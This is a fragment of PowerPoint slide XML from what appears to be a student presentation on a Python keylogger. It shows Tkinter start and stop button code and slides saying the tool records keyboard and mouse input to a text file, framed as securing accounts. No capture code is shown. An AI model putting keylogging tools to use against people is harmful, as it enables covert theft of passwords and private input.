                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>)</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start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>, state='disabled')</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stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="图片"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7467600" y="3695472"/>
            <a:ext cx="2392887" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18464311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457200" y="1143000"/>
            <a:ext cx="10681335" cy="693779"/>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0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>WOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="85" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>IN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>YOUR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="20" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>SOLUTION</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4250" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2553315" y="2758767"/>
            <a:ext cx="6334126" cy="2462213"/>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just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1287C2"/>
              </a:buClr>
              <a:buSzPct val="145000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>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华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3855978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10962893" y="98869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164" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1619587" y="230505"/>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华文楷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华文楷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华文楷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华文楷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华文楷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华文楷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华文楷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华文楷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165" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4628196" y="3355555"/>
            <a:ext cx="1924917" cy="865345"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4670439" y="3397798"/>
            <a:ext cx="1840430" cy="780859"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="78740" tIns="78740" rIns="78740" bIns="78740" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1377950">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Modelling</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="31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167" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5084627" y="2849526"/>
            <a:ext cx="1012054"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15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4795159" y="1372015"/>
            <a:ext cx="1590989" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4842583" y="1419439"/>
            <a:ext cx="1496141" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="63500" tIns="63500" rIns="63500" bIns="63500" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1111250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Threat modelling</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="25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170" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20082078">
            <a:off x="6476795" y="3225270"/>
            <a:ext cx="609744"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15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7057302" y="2140535"/>
            <a:ext cx="1983246" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7104726" y="2187959"/>
            <a:ext cx="1888399" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66040" tIns="66040" rIns="66040" bIns="66040" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1155700">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>Attack chain analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="26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173" name="曲线"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1187838">
            <a:off x="6546911" y="4170221"/>
            <a:ext cx="209851"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15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="2489BC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="圆角矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6750561" y="4064272"/>
            <a:ext cx="1912697" cy="971484"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16666"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="30ADEC"/>
          </a:solidFill>
          <a:ln w="15875" cmpd="sng" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6797986" y="4111696"/>
            <a:ext cx="1817849" cy="876636"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66040" tIns="66040" rIns="66040" bIns="66040" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="1155700">
              <a:lnSpc>
